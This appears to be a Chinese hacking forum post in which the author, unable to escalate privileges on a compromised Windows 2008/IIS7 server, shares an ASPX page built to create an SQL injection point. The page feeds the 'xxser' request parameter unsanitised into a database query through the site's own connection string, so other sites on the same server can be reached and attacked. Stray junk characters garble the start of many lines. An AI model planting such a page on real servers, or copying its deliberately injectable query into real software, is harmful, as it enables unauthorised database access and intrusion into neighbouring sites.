利用aspx构造注射来跨站

admin

昨天跟4z1看一个站点，提权很难提，看了整整5个小时，无果。 2008+iis7，无sa，无root，无各种服务。。。
/ s7 }7 R; s1 ]7 B$ M' E/ g其实中用到了aspx构造注射来跨站，网上找了一堆代码，没一个能用的。
) o) i: e' R* J& q代码量不多，自己写个拉倒了。烦死了。
1 f4 n& r+ g0 Q4 S) U0 Z! J
0 {8 y$ K$ I. }8 E$ ?1 N  L​
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
# W: `6 D) M5 w6 x  G8 O<head runat="server">
: K; F, Z* p% H2 m5 l" B2 S    <title>暗影aspx构造注射专用页面</title>
/ Y1 v% ]2 Q( t, d+ p</head>
; h+ E4 R1 ?% K' e<body>
7 P" h# p- g9 O+ [2 Y    <form id="form1" runat="server">
    <div>
, ^5 L. N: P- M- z) D     <script language="c#" runat="server">
) l& V& a, p! I, h. h6 B, m) T            
& l1 |/ h" [* z; m         void page_init(object sender, EventArgs e)
( g' H9 |: Z1 k$ C/ j9 f# J" H         {
: ?4 @% e, J/ f3 T5 m5 T+ n1 v            
: {2 A7 y$ b) |7 f             System.Data.SqlClient.SqlConnection conn = new System.Data.SqlClient.SqlConnection();
# n- u5 H! s( j7 @4 U" ?" Q            
             conn.ConnectionString = ConfigurationManager.ConnectionStrings["连接名"].ToString();
             conn.Open();
' g$ O) W( |" H  s3 S            
             string i =  this.Page.Request.Params["xxser"];  //这里是参数?xxser=1
% Q! e3 }% c( v+ k0 S* x( D. u            
6 N1 y* q7 o' R+ {. i& w1 l7 l             System.Data.SqlClient.SqlCommand command = new System.Data.SqlClient.SqlCommand("select * from [表] where 列名= " + i, conn);
             int x = command.ExecuteNonQuery();
             Response.Write(i+"\n");
; X/ N7 W: j3 _$ ?$ k% M+ {) B             Response.Write(x);
             conn.Close();
8 n* ]+ x3 h9 G* S' \6 r         }
% g- _  s* V5 h& M     
- z. k; b. y4 T% \8 r  </script>
    </div>
    </form>
</body>
</html>